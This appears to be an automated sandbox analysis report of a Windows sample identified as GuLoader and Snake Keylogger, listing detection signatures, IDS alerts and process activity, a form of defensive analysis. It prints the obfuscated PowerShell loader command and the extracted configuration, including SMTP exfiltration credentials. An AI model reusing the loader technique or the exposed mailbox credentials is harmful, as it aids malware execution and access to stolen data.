Windows
Analysis Report
Balance Pendiente.exe
Overview
General Information
Detection
GuLoader, Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Classification
- System is w10x64
Balance Pendiente.exe (PID: 6592 cmdline:
"C:\Users\ user\Deskt op\Balance Pendiente .exe" MD5: E70E71A31781B44F850A39693784CE74) powershell.exe (PID: 6964 cmdline:
"powershel l.exe" -wi ndowstyle minimized "$Bibrd=gc -Raw 'C:\ Users\user \AppData\R oaming\Kal kvrksarbej deren84\ch ego\revere nsens\Defm rkede\Cros sbeam.Dec1 22';$Antio dont=$Bibr d.SubStrin g(60335,3) ;.$Antiodo nt($Bibrd) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 7068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) msiexec.exe (PID: 5660 cmdline:
"C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:43.138773+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:45.588203+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:46.775686+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:41.175108+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:42.581340+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:43.800116+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:35.888216+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:53.628181+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00405E6B | |
Source: | Code function: | 0_2_00405427 | |
Source: | Code function: | 0_2_00402647 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 6_2_02EDF2D5 | |
Source: | Code function: | 6_2_02EDF4AC | |
Source: | Code function: | 6_2_02EDF974 |
Networking |
---|
Source: | Suricata IDS: |
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00404F90 |
System Summary |
---|
Source: | Static PE information: |
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_004030B8 |
Source: | Code function: | 0_2_00406141 | |
Source: | Code function: | 0_2_004047CF | |
Source: | Code function: | 1_2_06FFBED6 | |
Source: | Code function: | 6_2_02EDD278 | |
Source: | Code function: | 6_2_02ED538A | |
Source: | Code function: | 6_2_02EDC147 | |
Source: | Code function: | 6_2_02EDC752 | |
Source: | Code function: | 6_2_02EDC468 | |
Source: | Code function: | 6_2_02EDCA22 | |
Source: | Code function: | 6_2_02EDE988 | |
Source: | Code function: | 6_2_02ED3E17 | |
Source: | Code function: | 6_2_02EDCFC2 | |
Source: | Code function: | 6_2_02EDCCF2 | |
Source: | Code function: | 6_2_02ED7118 | |
Source: | Code function: | 6_2_02ED2A77 | |
Source: | Code function: | 6_2_02EDF974 |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_00404293 |
Source: | Code function: | 0_2_00402036 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Code function: | 0_2_00405E92 |
Source: | Code function: | 1_2_06FF98CA | |
Source: | Code function: | 1_2_06FF880D | |
Source: | Code function: | 1_2_06FF4BDB | |
Source: | Code function: | 1_2_06FF4B7C | |
Source: | Code function: | 1_2_06FFAF71 | |
Source: | Code function: | 1_2_08EE28BE |
Persistence and Installation Behavior |
---|
Source: | Joe Sandbox AI: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
